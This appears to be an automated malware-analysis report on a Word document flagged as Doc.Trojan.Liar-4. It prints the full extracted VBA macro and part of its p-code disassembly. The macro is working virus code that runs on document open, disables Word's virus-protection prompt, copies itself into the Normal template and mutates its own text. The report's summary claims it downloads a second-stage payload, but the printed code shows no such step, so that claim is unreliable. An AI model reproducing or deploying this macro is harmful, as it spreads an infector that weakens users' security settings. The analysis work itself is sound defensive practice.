Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be obfuscated and attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Liar-4' and the presence of a Document_Open macro strongly indicate malicious intent.
Heuristics (3)

- ClamAV: Doc.Trojan.Liar-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Liar-4
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8234 bytes |

SHA-256: 87df4beec9a64cff054cee8d401204ba2fa0347eee4ef4c5e5463a2a4fc44f39

Preview script: first 1,000 lines of the extracted script
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open() '
Dim v(200): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) '
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
If MacroContainer = s Then Set s = ActiveDocument '
Set nh = s.VBProject.VBComponents(1).CodeModule: li = abc.countoflines: y = 100 + Int(Rnd * 50) '
For i = 1 To li: jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) '
If p = 1 And li > y Then '
d = 1: GoTo n_ '
End If '
l = UCase(Left(abc.Lines(i, 1), (p - 1))) '
For o = 1 To Len(l): f = Mid(l, o, 1) '
If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) '
v(i) = v(i) & f: Next o '
For j = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next j '
v(i) = v(i) & t & jc '
If d = 2 Then v(i) = v(i) & vbCr & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
If nh.countoflines < (1 + 1 + 2) Then '
nh.deletelines 1, nh.countoflines: nh.addfromstring vc: nh.deletelines nh.countoflines, 1 '
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs ActiveDocument.FullName '
If Day(Now()) = 16 Then beg_to_differ '
End If '
End Sub '
Private Sub beg_to_differ() '
beg = "do you see what I see?" & vbCr '
beg = beg & "do you hear what I hear?" & vbCr '
beg = beg & "do you feel what I feel?" & vbCr '
beg = beg & "do you ever care?" & vbCr '
beg = beg & "I...beg to differ!" & vbCr '
beg = beg & "beg to differ!" & vbCr & vbCr '
beg = beg & "jack twoflower/Lz0/Meta" '
MsgBox beg, 0, "class.beg to differ" '
End Sub '
' Processing file: /opt/analyzer/scan_staging/d88a2c10132f4bb8b91ae47eefe76b10.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8520 bytes
' Line #0:
'   FuncDefn (Private Sub Document_Open())
'   QuoteRem 0x001C 0x0000 ""
' Line #1:
'   Dim
'   OptionBase
'   LitDI2 0x00C8
'   VarDefn v
'   BoS 0x0000
'   Ld Rnd
'   LitDI2 0x0000
'   Mul
'   Paren
'   Ld Options
'   MemSt VirusProtection
'   BoS 0x0000
'   Ld Rnd
'   LitDI2 0x0000
'   Mul
'   Paren
'   Ld Options
'   MemSt SaveNormalPrompt
'   QuoteRem 0x0056 0x0000 ""
' Line #2:
'   SetStmt
'   Ld MacroContainer
'   MemLd VBProject
'   Set a
'   BoS 0x0000
'   SetStmt
'   LitDI2 0x0001
'   Ld a
'   ArgsMemLd VBComponents 0x0001
'   Set ab
'   QuoteRem 0x003D 0x0000 ""
' Line #3:
'   SetStmt
'   Ld ab
'   MemLd CodeModule
'   Set abc
'   BoS 0x0000
'   SetStmt
'   Ld NormalTemplate
'   Set s
'   BoS 0x0000
'   LitDI2 0x0027
'   ArgsLd Chr 0x0001
'   St t
'   QuoteRem 0x003D 0x0000 ""
' Line #4:
'   Ld MacroContainer
'   Ld s
'   Eq
'   If
'   BoSImplicit
'   SetStmt
'   Ld ActiveDocument
'   Set s
'   EndIf
'   QuoteRem 0x0032 0x0000 ""
' Line #5:
'   SetStmt
'   LitDI2 0x0001
'   Ld s
'   MemLd VBProject
'   ArgsMemLd VBComponents 0x0001
'   MemLd CodeModule
'   Set nh
'   BoS 0x0000
'   Ld abc
'   MemLd countoflines
'   St li
'   BoS 0x0000
'   LitDI2 0x0064
'   Ld Rnd
'   LitDI2 0x0032
'   Mul
'   FnInt
'   Add
'   St y
'   QuoteRem 0x0060 0x0000 ""
' Line #6:
'   StartForVariable
'   Ld i
'   EndForVariable
'   LitDI2 0x0001
'   Ld li
'   For
'   BoS 0x0000
'   LitStr 0x0000 ""
'   St jc
'   BoS 0x0000
'   Ld Rnd
'   LitDI2 0x0003
'   Mul
'   FnInt
'   St d
'   BoS 0x0000
'   Ld i
'   LitDI2 0x0001
'   Ld abc
'   ArgsMemLd Lines 0x0002
'   Ld t
'   FnInStr
'   St p
'   QuoteRem 0x004A 0x0000 ""
' Line #7:
'   Ld p
'   LitDI2 0x0001
'   Eq
'   Ld li
'   Ld y
'   Gt
'   And
'   IfBlock
'   QuoteRem 0x0019 0x0000 ""
' Line #8:
'   LitDI2 0x0001
'   St d
'   BoS 0x0000
'   GoTo n_
'   QuoteRem 0x000F 0x0000 ""
' Line #9:
'   EndIfBlock
'   QuoteRem 0x0007 0x0000 ""
' Line #10:
'   Ld i
'   LitDI2 0x0001
'   Ld abc
'   ArgsMemLd Lines 0x0002
'   Ld p
'   LitDI2 0x0001
'   Sub
'   Paren
'   ArgsLd LBoun ... (truncated)
```